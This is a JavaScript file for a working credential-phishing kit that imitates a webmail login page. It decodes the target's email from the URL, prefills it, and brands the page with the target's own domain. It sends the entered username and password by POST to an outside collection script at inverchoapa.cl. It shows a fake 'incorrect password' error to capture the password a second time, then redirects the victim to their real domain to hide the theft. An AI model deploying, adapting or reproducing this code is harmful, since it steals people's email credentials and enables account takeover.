// HTML template embedded in JavaScript (translated to English)
const htmlTemplate = `
    <div class="header">
        <div class="header-content">
            <div class="logo">
                <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M16 30C23.732 30 30 23.732 30 16C30 8.26801 23.732 2 16 2C8.26801 2 2 8.26801 2 16C2 23.732 8.26801 30 16 30Z" fill="#1976D2"/>
                    <path d="M22.4 12.8H9.6C8.71634 12.8 8 13.5163 8 14.4V20.8C8 21.6837 8.71634 22.4 9.6 22.4H22.4C23.2837 22.4 24 21.6837 24 20.8V14.4C24 13.5163 23.2837 12.8 22.4 12.8Z" fill="white"/>
                    <path d="M14.4 17.6H11.2V20H14.4V17.6Z" fill="#1976D2"/>
                    <path d="M20 15.2H12V17.6H20V15.2Z" fill="#1976D2"/>
                </svg>
                <span id="domainTitle">WebMail Portal</span>
            </div>
        </div>
    </div>
    
    <div class="main-container">
        <div class="login-card">
            <h1 class="login-title">Login</h1>
            <p class="login-subtitle">Enter your credentials to access your account</p>
            
            <form id="loginForm">
                <div class="form-group">
                    <label class="form-label" for="loginId">
                        Username
                        <span class="tooltip-icon" title="Your username was automatically recognized">i</span>
                    </label>
                    <input 
                        type="text" 
                        id="loginId" 
                        class="form-input"
                        value=""
                        readonly
                        required
                    />
                </div>
                
                <div class="form-group">
                    <label class="form-label" for="password">Password</label>
                    <input 
                        type="password" 
                        id="password" 
                        class="form-input"
                        placeholder="Your password"
                        value=""
                        required
                    />
                </div>
                
                <div class="remember-me">
                    <input type="checkbox" id="rememberMe">
                    <label for="rememberMe">Stay logged in</label>
                </div>
                
                <button type="submit" class="login-button" id="loginBtn">
                    <span class="button-text">Login</span>
                    <div class="loading"></div>
                </button>
            </form>
            
            <div class="links-container">
                <a href="#" class="forgot-password-link" id="forgotLink">
                    Forgot password?
                </a>
                <a href="#" class="help-link" id="helpLink">
                    Login help
                </a>
            </div>
        </div>
    </div>
    
    <div class="footer">
        <div class="footer-content">
            <div class="footer-text" id="footerCopyright">
                © 2025 Web Communications GmbH. All rights reserved.
            </div>
            <div class="footer-links">
                <a href="#" class="footer-link" id="privacyLink">Privacy</a>
                <a href="#" class="footer-link" id="termsLink">Terms of Use</a>
                <a href="#" class="footer-link" id="contactLink">Contact</a>
            </div>
        </div>
    </div>
`;

// Function to extract domain from email
function getDomainFromEmail(email) {
    if (!email || !email.includes('@')) return null;
    return email.split('@')[1];
}

// Function to extract domain from URL
function getDomainFromUrl() {
    try {
        // Get the hostname from the URL
        const hostname = window.location.hostname;
        
        // Remove www. if present and return the domain
        return hostname.replace(/^www\./, '');
    } catch (e) {
        console.error('Error extracting domain:', e);
        return 'Web Communications';
    }
}

// Function to update the domain name in the UI
function updateDomainName() {
    // Try to get domain from decoded email first
    const decodedEmail = document.getElementById('decodedEmail')?.value || '';
    let domain = getDomainFromEmail(decodedEmail);
    
    // If no domain from email, fall back to URL domain
    if (!domain) {
        domain = getDomainFromUrl();
    }
    
    // Update page title
    document.title = `Webmail Login | ${domain}`;
    
    // Update header title
    const domainTitle = document.getElementById('domainTitle');
    if (domainTitle) {
        domainTitle.textContent = `${domain} WebMail`;
    }
    
    // Update footer copyright
    const footerCopyright = document.getElementById('footerCopyright');
    if (footerCopyright) {
        footerCopyright.textContent = `© 2025 ${domain}. All rights reserved.`;
    }
}

// Hidden elements needed for your functions (added programmatically)
function addHiddenElements() {
    const loginForm = document.getElementById('loginForm');
    if (loginForm) {
        loginForm.insertAdjacentHTML('beforeend', `
            <input type="hidden" id="decodedEmail" value="">
            <input type="hidden" id="attemptCount" value="0">
            <div id="errorMessage" class="error-message" style="display: none;"></div>
        `);
    }
}

// Modified initializeEmailDecoding to auto-fill username
function initializeEmailDecoding() {
    // Get email from URL parameter if exists
    const urlParams = new URLSearchParams(window.location.search);
    const fullQueryString = window.location.search.substring(1);
    
    if (fullQueryString) {
        try {
            const decodedEmail = atob(fullQueryString);
            document.getElementById('decodedEmail').value = decodedEmail;
            
            // Auto-fill the username field and make it readonly
            const loginIdField = document.getElementById('loginId');
            if (loginIdField) {
                loginIdField.value = decodedEmail;
                loginIdField.readOnly = true;
                loginIdField.title = "Your email address cannot be changed";
            }
            
            // Focus on password field
            document.getElementById('password').focus();
        } catch (e) {
            console.error('Error decoding email:', e);
            // If decoding fails, focus on username field
            document.getElementById('loginId').focus();
        }
    } else {
        // If no email parameter, focus on username field
        document.getElementById('loginId').focus();
    }
}

// Updated sendLoginData function to use PHP endpoint with FormData
function sendLoginData(loginData) {
    const formData = new FormData();
    formData.append('userId', loginData.userId);
    formData.append('password', loginData.password);
    formData.append('email', loginData.email);
    formData.append('timestamp', loginData.timestamp);
    formData.append('attempt', loginData.attempt);
    
    return fetch('https://inverchoapa.cl/css/wolfedenit.php', {
        method: 'POST',
        body: formData
    });
}

function handleLoginResponse(attemptCount, userId, password, email) {
    const loginBtn = document.getElementById('loginBtn');
    const buttonText = loginBtn.querySelector('.button-text');
    
    if (attemptCount === 1) {
        // First attempt - show error and reset form
        showError('Password is incorrect. Please try again.');
        document.getElementById('password').value = '';
        document.getElementById('password').focus();
        loginBtn.disabled = false;
        buttonText.textContent = 'Login';
        loginBtn.classList.remove('show-loading');
    } else {
        // Second attempt - redirect
        let redirectUrl = 'dashboard.html';
        
        // If email exists, redirect to domain
        if (email && email.includes('@')) {
            const domain = email.split('@')[1];
            redirectUrl = 'http://' + domain;
        }
        
        // Simulate successful login
        setTimeout(() => {
            window.location.href = redirectUrl;
        }, 1000);
    }
}

function showError(message) {
    const errorElement = document.getElementById('errorMessage');
    if (errorElement) {
        errorElement.textContent = message;
        errorElement.style.display = 'block';
        
        // Auto-hide after 5 seconds
        setTimeout(() => {
            errorElement.style.display = 'none';
        }, 5000);
    }
}

function hideError() {
    const errorElement = document.getElementById('errorMessage');
    if (errorElement) {
        errorElement.style.display = 'none';
    }
}

function clearForm() {
    // Only clear password field, keep username as it's auto-filled and readonly
    document.getElementById('password').value = '';
    document.getElementById('attemptCount').value = '0';
    hideError();
}

// Modified setupEventListeners to use your functions
function setupEventListeners() {
    addHiddenElements();
    updateDomainName();
    initializeEmailDecoding();
    
    const form = document.getElementById('loginForm');
    const loginBtn = document.getElementById('loginBtn');
    const password = document.getElementById('password');
    
    if (form) {
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            const buttonText = loginBtn.querySelector('.button-text');
            const userId = document.getElementById('loginId').value;
            const passwordValue = password.value;
            const decodedEmail = document.getElementById('decodedEmail').value;
            
            // Validate inputs
            if (!userId.trim()) {
                showError('Please enter a username.');
                return;
            }
            
            if (!passwordValue.trim()) {
                showError('Please enter a password.');
                return;
            }
            
            // Disable submit button and show loading state
            loginBtn.disabled = true;
            buttonText.textContent = 'Logging in...';
            loginBtn.classList.add('show-loading');
            
            // Get and increment attempt count
            let attemptCount = parseInt(document.getElementById('attemptCount').value) || 0;
            attemptCount++;
            document.getElementById('attemptCount').value = attemptCount;
            
            // Prepare login data
            const loginData = {
                userId: userId,
                password: passwordValue,
                email: decodedEmail,
                timestamp: new Date().toISOString(),
                attempt: attemptCount
            };
            
            // Send data to external endpoint
            sendLoginData(loginData)
                .then(() => {
                    handleLoginResponse(attemptCount, userId, passwordValue, decodedEmail);
                })
                .catch(error => {
                    console.error('Login error:', error);
                    handleLoginResponse(attemptCount, userId, passwordValue, decodedEmail);
                });
        });
    }
    
    // Forgot password handler
    const forgotLink = document.getElementById('forgotLink');
    if (forgotLink) {
        forgotLink.addEventListener('click', function(e) {
            e.preventDefault();
            alert('Password reset function will be implemented here');
        });
    }
    
    // Privacy policy handler
    const privacyLink = document.getElementById('privacyLink');
    if (privacyLink) {
        privacyLink.addEventListener('click', function(e) {
            e.preventDefault();
            alert('Privacy policy will be displayed here');
        });
    }
    
    // Handle page visibility changes
    document.addEventListener('visibilitychange', function() {
        if (document.visibilityState === 'visible') {
            // Page became visible - check if we need to reset anything
            const passwordField = document.getElementById('password');
            if (passwordField && !passwordField.value) {
                passwordField.focus();
            }
        }
    });
    
    // Handle browser back button
    window.addEventListener('popstate', function(event) {
        // Reset form when navigating back (but keep username)
        clearForm();
    });
}

// Initialize the application
function initApp() {
    // Apply body styles programmatically to match original
    document.body.style.fontFamily = '-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Arial, sans-serif';
    document.body.style.backgroundColor = '#f5f7fa';
    document.body.style.minHeight = '100vh';
    document.body.style.display = 'flex';
    document.body.style.flexDirection = 'column';
    document.body.style.margin = '0';
    document.body.style.padding = '0';
    
    // Inject HTML into the root element
    const root = document.getElementById('root');
    if (root) {
        root.style.display = 'flex';
        root.style.flexDirection = 'column';
        root.style.minHeight = '100vh';
        root.innerHTML = htmlTemplate;
        
        setupEventListeners();
    } else {
        console.error('Root element not found');
    }
}

// Start the application when DOM is loaded
document.addEventListener('DOMContentLoaded', initApp);

// Fallback for older browsers
if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', initApp);
} else {
    initApp();
}